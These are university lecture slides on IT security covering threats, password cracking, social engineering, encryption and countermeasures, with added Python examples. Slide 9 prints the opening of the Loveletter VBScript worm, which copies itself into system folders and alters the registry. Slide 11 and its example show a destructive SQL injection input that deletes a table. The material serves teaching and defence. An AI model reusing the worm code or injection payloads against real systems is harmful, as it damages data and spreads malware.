Slide 1: IT security. A quick tour. © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott, Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems.


Slide 2: The security problem is real. (Chart: recorded cases of computer criminality and credit card fraud. Source: Bundeskriminalamt 2004.)

Slide 3: Registered frauds. (Chart. Source: CERT® Coordination Center, Software Engineering Institute, Carnegie Mellon University, June 2005.)

Slide 4: Internet criminality as shooting star. (Chart: trends in computer criminality in Germany. Source: Bundeskriminalamt. Categories: computer criminality, especially credit card fraud; data and program misuse; hacking, spying; computer frauds; computer sabotage; spying; program piracy, i.e. dealing with illegal copies of programs.)

Slide 5: Overview.
• Overview
• Some threats (some!)
• Example solutions
  » Authentication: who is it?
  » Encryption: keep data confidential
• What to do?

Slide 6: Data Security: DIN 44300, Part 1.
• protection of data (stored or transmitted) from destruction (loss, damage, manipulation) and from misuse
• privacy protection: protection of persons from impairment through the processing of data about them
(Figure: spying, fraud, non-availability, sabotage.)

Slide 7: Security criteria.
• integrity
  » consistency: data are not contradictory
  » correctness: data correspond to reality
• confidence (confidentiality)
  » data access only by authorized persons
• authenticity
  » authentication of users
  » data persistence
• availability
  » access to programs and data at any (intended) time by authorized persons
Examples for security risks: DoS, DDoS, mail flooding; hacking; fake orders, spoofing; spying, fraud, non-availability, sabotage. Damage caused by computer viruses worldwide in 2003: 55 billion $.

Slide 8: MS Outlook Loveletter. (Screenshot of the mail.)

Slide 9: A simple Visual Basic program.
    rem barok -loveletter(vbe)
    rem by: spyder / Group / Manila,Philippines
    On Error Resume Next
    dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
    eq=""
    ctr=0
    Set fso = CreateObject("Scripting.FileSystemObject")
    set file = fso.OpenTextFile(WScript.ScriptFullname,1)
    vbscopy=file.ReadAll
    main()
    sub main()
    On Error Resume Next
    dim wscr,rr
    set wscr=CreateObject("WScript.Shell")
    rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
    if (rr>=1) then
    wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
    end if
    Set dirwin = fso.GetSpecialFolder(0)
    Set dirsystem = fso.GetSpecialFolder(1)
    Set dirtemp = fso.GetSpecialFolder(2)
    Set c = fso.GetFile(WScript.ScriptFullName)
    c.Copy(dirsystem&"\MSKernel32.vbs")
    c.Copy(dirwin&"\Win32DLL.vbs")
    c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
    ....

Slide 10: (relatively) latest viruses. (Chart: time lags between discovery and prevention of new viruses.)

Slide 11: similar: SQL injection.
File index.htm: a form whose input field is sent as $sstring; sample inputs shown on the slide: "Maier" and "Maier; delete from sometable".
File db-request.php:
    ...
    $selstring = "SELECT * FROM sometable WHERE afield='$sstring'";
    $conn = pg_Connect("localhost", "5432","","","somedb");
    $result = pg_Exec($conn, $selstring);
    ...
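As an added example (not code from the slides), the same query built in Python with sqlite3: once by pasting the input into the SQL text as the PHP on the slide does, and once with a bound parameter. The table, its rows and the quote-closing form of the slide's injected input are constructed for this example.

```python
import sqlite3

# Constructed sample table standing in for "sometable" on the slide
SAMPLE_ROWS = [("Maier", "Heidenheim"), ("Schmidt", "Ulm"), ("Huber", "Aalen")]

# The slide's two inputs. The injected one is written so that it closes the
# quote the query puts around the input and ends in a harmless statement that
# swallows the dangling closing quote (constructed for this example).
INPUT_OK = "Maier"
INPUT_INJECTED = "Maier'; delete from sometable; select '"


def make_db():
    """Fresh in-memory database with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sometable (afield TEXT, city TEXT)")
    conn.executemany("INSERT INTO sometable VALUES (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def rows_left(conn):
    """Number of rows currently in sometable."""
    return conn.execute("SELECT COUNT(*) FROM sometable").fetchone()[0]


def build_query_vulnerable(sstring):
    """Same construction as $selstring on the slide: input pasted into SQL."""
    return f"SELECT * FROM sometable WHERE afield='{sstring}'"


def query_vulnerable(conn, sstring):
    """Runs the interpolated text. executescript, like pg_Exec, executes every
    statement in the string, so injected statements run too. Returns how many
    rows survive the call."""
    conn.executescript(build_query_vulnerable(sstring))
    return rows_left(conn)


def query_safe(conn, sstring):
    """Parameterized query: the input travels as a bound value, never as SQL,
    so it can only ever be compared with afield. Returns the matching rows."""
    cur = conn.execute("SELECT afield, city FROM sometable WHERE afield = ?",
                       (sstring,))
    return cur.fetchall()


if __name__ == "__main__":
    db = make_db()
    print(build_query_vulnerable(INPUT_INJECTED))
    print("rows after vulnerable query:", query_vulnerable(db, INPUT_INJECTED))
    db = make_db()
    print("safe query result:", query_safe(db, INPUT_INJECTED),
          "rows left:", rows_left(db))
```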

Slide 12: Distributed Denial-of-Service Attack (DDoS). (Figure: the attacker hacks a master, which installs a demon on slaves; the slaves attack the victim.) Problems: separating "good" from "bad" requests; router misconfiguration: malformed IP packets knock out the router function. Mentioned countermeasure: Intrusion Detection Systems.

Slide 13: Wardriving, LAN jacking: invading mobile networks. (Figure.)

Slide 14: Countermeasures. (Matrix of measures against the security goals availability, authenticity, confidence, integrity.) Measures: intrusion detection, digital signatures, encryption, VPN, firewall, access control, backup, password, biometry, virus protection, Managed Security Services.

Slide 15: Script kiddies: using hacker tools without responsibility. (Chart: skills of attackers vs. complexity of hacker tools over time. Source: c't 2/2002, p. 79. Labels: guessing of passwords, viruses, cracking of passwords, intrusion into unsecured systems, web worms.)

Slide 16: Example: prevent unauthorized access.
• user identification
  » password, biometric methods, authentication methods
• define user privileges
  » who is authorized for access to which resources
• admission control, access control
  » firewall, Intrusion Detection Systems
• encryption
  » access to the data is possible, but use of the data is not

Slide 17: Password cracking.
• brute force hack
  » trying out all possible combinations of characters
• dictionary hack
  » trying out a list of often used and well known passwords or dictionaries
  » hybrid attack: combine dictionary password with numbers/characters
• spying out
  » looking over the shoulder
  » infiltrating a trojan horse
• Social Engineering
  » exploiting the naivety of persons who (don't) keep a secret
  » e.g.: fake mail to employees with sender spoofing ("IT security dept.") and password request
  » A recent study (BBC News) showed that 92% of participating people revealed personal details like mother's maiden name, first school, ... (Comm. ACM Vol. 48/6 p. 10)

Slide 18: Default passwords. (Table.)

Slide 19: Default passwords contd. (Table.)

Slide 20: Social engineering. With Java and JavaScript it is simple to implement a trojan horse which transmits the dial-up password to the hacker. (Screenshots: a popup window imitating the dial-up window to the ISP; a message box feigning a connection breakdown.)

Slide 21: Social engineering. (Screenshots: original and fake.)

Slide 22: Example: Telekom phishing mail. (Screenshot.)

Slide 23: Biometry.
• hand geometry: position of bones and knuckles
• facial recognition: geometric position of eyes, nose; proportions
• iris: pattern around the pupil
• retina: vascular patterns on the retina
• voice: pattern of sound / frequency, rhythm of speech
• handwriting: speed, pressure, direction, ...
• typing rhythm
• fingerprint

Slide 24: eTokens. (Pictures.)

Slide 25: Encryption.
Problem: Data transmission over public (esp. wireless) networks is public!
Solution: Private network (expensive) or encryption: the sender applies a (mathematical) function to the message in a way that only (!) the receiver can recover the original.
  sender:   E = e(K, M), with K = key, M = message
  receiver: M = d(K, E), with E = encrypted message
  works if M = d(K, e(K, M))

Slide 26: Substitution cipher.
Simple encryption technique: replace every character by a different one. The transformation is the key:
  Original alphabet: abcdefghijklmnopqrstuvwxyz
  Key:               qfwgxbdkpjhyzstiarnouvcelm
Encrypted text:
  q wkpbbrx kqn ot xsnurx xauqy irtfqfpypopxn btr qyy wkqrqwoxrn ot irxvxso npziyx brxauxswl fqnxg qsqylnpn q npziyx nufnopouopts pn sto nubbpwpxso qslftgl cpok q fpo tb opzx tr q wtziuoxr wqs frxqh nuwk wtgxn xqnpyl okxnx wtgxn cxrx unxg usopy okx spsxoxxsok wxsourl qsg cxrx rxiyqwxg fl wtgxn okqo wkqsdx okx nufnopouopts iqooxrs cpok xqwk wkqrqwoxr

Slide 27: Cryptanalysis. (Chart: relative frequency of the characters a-z in the encrypted text vs. in (English) text (publication).)
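An added example (not code from the slides): the substitution cipher of slide 26 written as the e(K, M) / d(K, E) pair of slide 25, with the slide's key and encrypted text embedded, plus the letter-frequency ranking that the cryptanalysis on this slide relies on. The English frequency order used for the guess is an assumption of this example.

```python
from collections import Counter
import string

PLAIN = string.ascii_lowercase
# Key from slide 26: plaintext letter PLAIN[i] is written as KEY[i]
KEY = "qfwgxbdkpjhyzstiarnouvcelm"

# Encrypted text from slide 26
CIPHERTEXT = (
    "q wkpbbrx kqn ot xsnurx xauqy irtfqfpypopxn btr qyy wkqrqwoxrn ot "
    "irxvxso npziyx brxauxswl fqnxg qsqylnpn q npziyx nufnopouopts pn sto "
    "nubbpwpxso qslftgl cpok q fpo tb opzx tr q wtziuoxr wqs frxqh nuwk "
    "wtgxn xqnpyl okxnx wtgxn cxrx unxg usopy okx spsxoxxsok wxsourl qsg "
    "cxrx rxiyqwxg fl wtgxn okqo wkqsdx okx nufnopouopts iqooxrs cpok xqwk "
    "wkqrqwoxr"
)

# Typical letter order in English text, most frequent first (assumed here)
ENGLISH_ORDER = "etaoinshrdlcumwfgypbvkjxqz"

ENCRYPT_TABLE = str.maketrans(PLAIN, KEY)
DECRYPT_TABLE = str.maketrans(KEY, PLAIN)


def encrypt(message: str) -> str:
    """E = e(K, M): substitute every letter by its key letter."""
    return message.translate(ENCRYPT_TABLE)


def decrypt(ciphertext: str) -> str:
    """M = d(K, E): inverse substitution, so d(K, e(K, M)) == M."""
    return ciphertext.translate(DECRYPT_TABLE)


def letter_frequencies(text: str) -> dict:
    """Relative frequency of each letter a-z in text (non-letters ignored)."""
    letters = [c for c in text.lower() if c in PLAIN]
    counts = Counter(letters)
    return {c: n / len(letters) for c, n in counts.items()}


def guess_key_by_frequency(ciphertext: str) -> dict:
    """Cryptanalysis without the key: rank ciphertext letters by frequency and
    pair them with the English order. Returns cipher letter -> guessed plain."""
    ranked = [c for c, _ in Counter(
        ch for ch in ciphertext if ch in PLAIN).most_common()]
    return dict(zip(ranked, ENGLISH_ORDER))


def guessed_decrypt(ciphertext: str) -> str:
    """Apply the frequency guess. The frequent letters (e, t, a) come out
    right, the rare ones are usually wrong, so this is a starting point that
    an analyst refines word by word."""
    guess = guess_key_by_frequency(ciphertext)
    return "".join(guess.get(c, c) for c in ciphertext)
```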

Slide 28: Decrypted text.
  a chiffre has to ensure equal probabilities for all characters to prevent simple frequency based analysis a simple substitution is not sufficient anybody with a bit of time or a computer can break such codes easily these codes were used until the nineteenth century and were replaced by codes that change the substitution pattern with each character
Experiment: the message has a length of one character. Is cryptanalysis possible? No! If the key has the same length as the message, the encryption is unbreakable! (One-time pad)
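An added example (not from the slides) of the one-character experiment and the one-time pad: with a key as long as the message, every candidate plaintext is explained by some key, so the ciphertext carries no information; the key-reuse function shows the caveat that makes the pad one-time. Byte-wise XOR is the pad operation assumed here.

```python
import secrets


def otp_encrypt(message: bytes, key: bytes) -> bytes:
    """E = e(K, M) with a key exactly as long as the message (XOR per byte)."""
    if len(key) != len(message):
        raise ValueError("one-time pad key must be exactly as long as the message")
    return bytes(m ^ k for m, k in zip(message, key))


def otp_decrypt(ciphertext: bytes, key: bytes) -> bytes:
    """M = d(K, E): XOR is its own inverse, so d(K, e(K, M)) == M."""
    return otp_encrypt(ciphertext, key)


def new_key(length: int) -> bytes:
    """Fresh, uniformly random key; it must never be used for a second message."""
    return secrets.token_bytes(length)


def key_explaining(ciphertext: bytes, candidate: bytes) -> bytes:
    """The key under which `candidate` would have produced `ciphertext`."""
    return otp_encrypt(ciphertext, candidate)


def every_candidate_fits(ciphertext: bytes, candidates) -> bool:
    """The slide's experiment: for a one-character message (and in general for
    any message with a key of equal length) each candidate plaintext is
    explained by a valid key, so the ciphertext alone tells the analyst
    nothing about which one was sent."""
    return all(otp_decrypt(ciphertext, key_explaining(ciphertext, c)) == c
               for c in candidates)


def reuse_leak(ct1: bytes, ct2: bytes) -> bytes:
    """Caveat: two ciphertexts made with the same key XOR to m1 XOR m2; the key
    cancels out and the messages start to leak. This is why the pad is used
    exactly once, and why the long key is the transmission problem slide 30
    mentions."""
    return bytes(a ^ b for a, b in zip(ct1, ct2))
```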

Slide 29: Enigma. (Picture.)

Slide 30: Real encryption techniques.
• Complex combination of substitution and transposition
  » DES (old), AES (new)
• Symmetric: sender and receiver use the same key
  » Problem: how to transmit the key
    – to many partners
    – long key (one-time pad)
  » Unsolved
• Asymmetric: different keys
  » Public/private key
  » Discrete mathematics: factorization of products of large prime numbers is difficult
• Signature: one-way functions

Slide 31: Protection of data transmission.
• encryption
  » access is useless for attackers
• electronic certificates/signatures
  » authentication of communication partners
• combination: Virtual Private Network (VPN)
  » data packets get unpacked and transmitted in a tunnel
(Figure: VPN client (e.g. firewall) to VPN client; provides confidence and authenticity.)

Slide 32: Security measures in use. (Chart, Germany vs. USA, in percent: antivirus software, Virtual Private Networks (VPN), automatic backup, personal firewalls, content filtering, intrusion detection systems, network firewalls, application firewalls, dial-back or secure modems. Source: IT-Security 2003; June-July, 2500 interviews with CIOs.)

Slide 33: Best practices that block most attacks.
• Use an application layer firewall.
• Automatically update your antivirus software at the gateway, server and client.
• Keep all of your systems and applications updated. Hackers commonly break into a Web site through known security holes, so make sure your servers and applications are patched and up to date.
• Turn off unnecessary network services.
• Remove all unneeded programs.
• Scan the network for common backdoor services: use intrusion detection systems, vulnerability scans, antivirus protection.

Slide 34: Problems with secure systems.
• Easy to block most (simple) attacks
• How to block qualified attackers?
• Tradeoff: security vs. usability vs. cost
Problem: bad usability can lead to bad security: restrictive password policy --> hard to remember --> people write passwords down on paper.

Slide 35: Clever solutions.....
• Instead of passwords, ask personal questions
  » personal entropy
  » Name of your most loved pet?
  » The name of Paris Hilton's dog is Tinkerbell
  » Her T-Mobile account was hacked
• Logins are blocked after some unsuccessful attempts (typ. 3)
  » You are bidding on something at eBay, you know your hardest competitor's name, try to log in with his account and some password --> his account will be blocked --> Denial of Service attack
• What would happen if ATMs required your fingerprint?
  » Maybe less fraud?
  » Maybe more people will be robbed? (See cars with engine immobilisers)
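An added example (not from the slides) of the lockout point above: a hard "block after 3 failures" policy lets anyone lock the real owner out, while a per-(account, source) backoff keeps the owner's access and still slows repeated failures. The class names, the delays and the fake clock are constructed for this example.

```python
from collections import defaultdict


class HardLockout:
    """Policy from slide 35: the account is blocked after max_failures failed
    logins, no matter where the attempts came from."""

    def __init__(self, max_failures: int = 3):
        self.max_failures = max_failures
        self.failures = defaultdict(int)

    def attempt(self, account: str, source: str, password_ok: bool) -> str:
        if self.failures[account] >= self.max_failures:
            return "locked"           # even the real owner is turned away
        if password_ok:
            self.failures[account] = 0
            return "ok"
        self.failures[account] += 1
        return "denied"


class BackoffThrottle:
    """Alternative that keeps the owner's access: failures are counted per
    (account, source) and each failure doubles the wait before the next try
    from that source, up to a cap. A stranger's failures never block the owner."""

    def __init__(self, clock, base_delay: float = 1.0, max_delay: float = 300.0):
        self.clock = clock            # callable returning seconds (injected for tests)
        self.base_delay = base_delay
        self.max_delay = max_delay
        self.state = {}               # (account, source) -> (failures, not_before)

    def attempt(self, account: str, source: str, password_ok: bool) -> str:
        key = (account, source)
        failures, not_before = self.state.get(key, (0, 0.0))
        now = self.clock()
        if now < not_before:
            return "throttled"        # too early: the password is not even checked
        if password_ok:
            self.state.pop(key, None)
            return "ok"
        failures += 1
        delay = min(self.max_delay, self.base_delay * 2 ** (failures - 1))
        self.state[key] = (failures, now + delay)
        return "denied"


class FakeClock:
    """Constructed clock so the example runs deterministically offline."""

    def __init__(self):
        self.t = 0.0

    def __call__(self) -> float:
        return self.t

    def advance(self, seconds: float):
        self.t += seconds
```

A throttle keyed by source does not slow attempts arriving from many different sources, so in practice it is paired with per-account alerting rather than used on its own.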

Slide 36: You can use the most advanced technology... (Picture.)

Slide 37: Someone will find a way to break your system if he really wants... (Picture.)

Slide 38: You can just make his life a little harder... (Picture.)

Slide 39: There is no secure system.
• Don't trust anybody who tells you he can build an absolutely secure system: he's either naive or lying.
  » The weakest link counts (possibly out of your control): SQL Slammer took out 20% of ATM machines in the US (cost banks tens of millions of dollars), Continental couldn't fly for 12 hours. Why? Not because the servers were vulnerable, but because the network connections were overloaded.
• Design problems (protocols, languages, ...)
  » not designed for today's use
  » Solutions are known but hard to use, example:
    – no stack protection in many languages
    – manipulations are possible, for example:
    – buffer overflows could be avoided but are often not (more work)
    – SQL injection could be avoided but is often not (more work)
• Programming errors (bugs)
  » allow exploits, patches are always late (zero day exploits)
• (better) processes can help avoiding problems

Slide 40: Level of security.
• How much security do you need?
  » Analyze data, risks, ...
  » Online weather forecast vs. online banking
• How much security do you want?
  » Usability
  » Cost
• Methods for dealing with risks
  » technical
  » organizational (education, ...)
• No silver bullet
• Security services are (and will be even more) good business
  » Communications of the ACM Vol 48/6 pp. 82

Slide 41: Security conception. (Flow diagram.) Preconditions: security goals, actual state, system limits. Steps: specification of security objects; policy conception (Security Policy); damage analysis, risk analysis, threat analysis (recognising, evaluating and avoiding threats); updating the conception.

Slide 42: A final risk remains... (Diagram: the overall risk without security procedures is reduced by risk prevention (firewall, intrusion detection), risk reduction (education, virus tools) and risk shifting (insurance); what is left is the residual risk.) Risk estimation of the security tools used: certificates, certification authorities; security standards. Problem: estimation of the residual risk.